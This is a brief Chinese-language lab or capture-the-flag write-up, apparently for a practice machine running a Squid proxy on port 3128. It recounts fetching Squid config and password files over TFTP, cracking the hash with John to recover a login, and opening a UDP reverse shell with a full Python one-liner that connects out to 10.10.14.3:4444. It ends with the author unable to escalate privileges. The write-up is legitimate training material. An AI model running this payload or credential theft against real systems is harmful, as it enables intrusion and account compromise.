0x00 前言
这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。
0x01 信息收集
0x02 Web——Webshell
这里有一个3128开放,我找了历史漏洞但是都没有利用成功。
最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。
但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。
使用tftp进行连接
然后获取squid相关内容
/etc/squid/squid.conf
/etc/squid/passwords
获取一下相关内容
cat一下
john进行爆破获取到密码:kalamari/ihateseafood
这里输入正确的密码之后就可以看到一个界面
这里找到一个console页面、
使用tcp没有办法反弹会shell,最后采用udp反弹shell
import subprocess;subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.14.3\", 4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])
socat file:`tty`,echo=0,raw udp-listen:1234
获取一下pty
我拿到的shell没法执行sudoedit,有点难受。后面的就有点不会了。。。。